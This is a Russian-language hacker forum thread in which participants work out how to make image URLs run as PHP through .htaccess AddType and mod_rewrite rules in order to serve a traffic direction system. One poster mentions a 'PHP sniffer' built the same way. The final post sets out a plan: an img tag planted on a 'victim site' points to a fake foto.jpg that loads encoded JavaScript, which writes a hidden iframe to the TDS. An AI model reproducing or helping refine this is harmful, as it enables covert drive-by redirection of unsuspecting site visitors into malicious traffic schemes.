Iframe на jpeg

[Ar3s]

Сидел и вспоминал как это правильно делается.
Вообщем суть. Есть iframe вида

<iframe src="http://site.ru/tds/image.jpg" hspace="0" vspace="0" frameborder="0" border="0" framespacing="0" marginwidth="0" marginheight="0" style="border-style: solid; border-width: 0px; width: 100%; height: 100%" width="100%" height="100%"></iframe>

По адресу http://site.ru/tds/image.jpg лежит обычный php файл. Нужно было что-то прописать вроде в .htaccess чтобы jpg обрабатывался как php. НО нужно чтобы это правило действовало только в этой папке и не распространялось на вложенные, где лежит сам шаблон tds.
Кто напомнит подробности - с меня +

Спасибо.

 

[lisa99]

самой интересно вот что.
Если можно разрешить выполнять php код в html
вот этой директивой

Выполнять код PHP в файлах HTML

RemoveHandler .html .htm 
AddType application/x-httpd-php .php .htm .html .phtml

то можно и приписать расширение .jpg как я понимаю
Для обычных картинок это не повредит. Для тех, куда инжектирован код - вызовет обработчик.

Но чего я не знаю- а есть ли глобальные настройки , на хостинге например, которые не допустят локальное выполнение этой директивы?

 

[Zer0]

глянте на любой пхп сниффер спомошю хтаксесса это пишется

<Files \"g.gif\">
AddType application/x-httpd-php .gif
</Files

 

[Mr.Di]

изврощенчеге вы какие-то все =\

RewriteEngine On
RewriteRule ^(.*)\.(jpg)$ index.php?get_image=$1 [L]

 

[lisa99]

ты умочко, без сомненья.. :baby:
Но у мну вредная привычка перепроверять...

RewriteEngine On - а всегда ли прокатит эта директива на чужом хосте?

 

[Mr.Di]

если мод-реврайт включен, что в принципе уже как де-факто

 

[SilverT]

lisa99
Почему на чужом? tds`ка то на своем хосте.

 

[wutang]

а .htaccess на чужом )))))

 

[SilverT]

wutang

а .htaccess на чужом )))))

По адресу http://site.ru/tds/image.jpg лежит обычный php файл. Нужно было что-то прописать вроде в .htaccess чтобы jpg обрабатывался как php.

wutang , соответственно .htaccess тоже на том же хосте, где и tds. На чужом хосте лишь страничка с iframe, опять же при таком раскладе можно и <img src="" /> сделать.

Zer0 кстати правильно написал, весьма приемлемый вариант.

 

[Chaos_Code]

RewriteEngine On
RewriteRule ^(.*)\.(jpg)$ index.php?get_image=$1 [L]

Не лучший вариант, будет через скрипт пускать все jpg, что медленно, и в подпапках тоже. Чтобы только в этой подпапке, надо так:

RewriteEngine On
RewriteRule ^(^\/)\.(jpg)$ index.php?get_image=$1 [L]

Лучше всего как Zero. Но не все хостинги позволяют AddType, тогда можно так:

По адресу http://site.ru/tds/image.jpg лежит обычный php файл.

Тогда же проще всего в папке tds положить .htaccess и прописать в него следующее:

RewriteEngine On
RewriteBase /tds/

RewriteRule (.*)$       /tds/script.php [QSA,L]

Или если для любых jpg, которые не являются реальными файлами, то так:

RewriteEngine On
RewriteBase /admin/

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-l
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(^\/)\.jpg$       /admin/getphpscript.php?r=$1 [QSA,L]

Вроде так Только в последнем случае предусмотреть защиту от php injection.

 

[lisa99]

как сложно...+в репку от меня. впечатлило.

Вроде так Только в последнем случае предусмотреть защиту от php injection.

фигасе..совет))

или ТС новую тему создавать, как избежать инклуда?

 

[Chaos_Code]

как избежать инклуда? smile.gif

С помощью регулярок порезать в имени файла все кроме букв, цифр и точки, дефиса и подчеркивания=)

типа

if(!isset($_GET['file'])) {
    exit()
}

$file = preg_replace("~[^A-z\.\-_]*~", $_GET['file']);

//пустая переменная или файл с точки(скрытый)
// или  не существует, тогда прекраем работу
if(!$file || (substr($file,0,1) == '.') || !file_exists($file)) exit();

 

[Ar3s]

Так... Читал, думал, опять читал, перечитал три раза, долго думал...
Суть: может написать мини-напоминалку на тему как поднять tds с использованием RewriteEngine.... ?
А то все как-то не просто у вас получается. Сегодня-завтра буду пробовать все варианты. Посмотрим что удачнее всего будет работать.

Параллельный вопрос: какую tds посоветуете для этих целей? Пока смотрю в сторону сутры, но одна голова хорошо, а две лучше. Может нарекания на нее есть?

 

[lisa99]

какую tds посоветуете для этих целей?

вообще то есть одна tds у мну...отдам в ваш приват, если надо

 

[Mr.Di]

нодо, нодо =\

 

[Ar3s]

DiFor Не попрошайничай

lisa99 Название дай хотя бы.

 

[Mr.Di]

как это не попрошайничай? а как мне жыть-та? :fool: :crazy:

 

[cyberianbrain]

может проще так?
<image src="myphp.php" />

 

[Mr.Di]

попробуйте, потом говорите. не просто так люди обходят это, или вы считаете что все настолько тупы, что не знают банальных хтмл тегов?

 

[Ar3s]

С вашего позволения подниму старую тему. Приспичило мне...

Итак:

На сайте жертвы размещаем:

<img src=http://sait.com/images/foto.jpg>

На моем сайте создаю следующий пакет файлов:
foto.jpg в котором прописываю

<img src="img.gif">
<script type="text/javascript" src="js.js"></script>

img.gif - который на самом деле является однопиксельным прозрачным гифом или любой другой картинкой.

js.js в котором прописано примерно следующее, закодированное в js:

document.write("<iframe src="http://site2.com/tds/index.php"></iframe>";

.htaccess в котором мне все это нужно разрулить:

AddType application/x-httpd-php .jpg

Все ли правильно я написал господа?